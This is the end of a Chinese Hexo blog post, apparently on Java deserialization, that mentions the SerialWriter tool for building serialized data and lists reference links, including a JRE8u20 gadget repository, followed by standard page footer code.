<p>QAX的一位大佬写了一个SerialWriter项目，实现了面向对象生成序列化数据的方法，无需手动计算Reference地址。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/QAX-A-Team/SerialWriter">https://github.com/QAX-A-Team/SerialWriter</a></p>
<h2 id="0x03-参考及引用"><a href="#0x03-参考及引用" class="headerlink" title="0x03 参考及引用"></a>0x03 参考及引用</h2><ul>
<li><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/TAjfHEJCvP-1yK2hUZlrbQ">https://mp.weixin.qq.com/s/TAjfHEJCvP-1yK2hUZlrbQ</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/176672.html">https://www.freebuf.com/vuls/176672.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/87270">https://www.anquanke.com/post/id/87270</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/pwntester/JRE8u20_RCE_Gadget">https://github.com/pwntester/JRE8u20_RCE_Gadget</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/QAX-A-Team/SerialWriter">https://github.com/QAX-A-Team/SerialWriter</a></li>
</ul>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>  Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.xml"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>






</html>
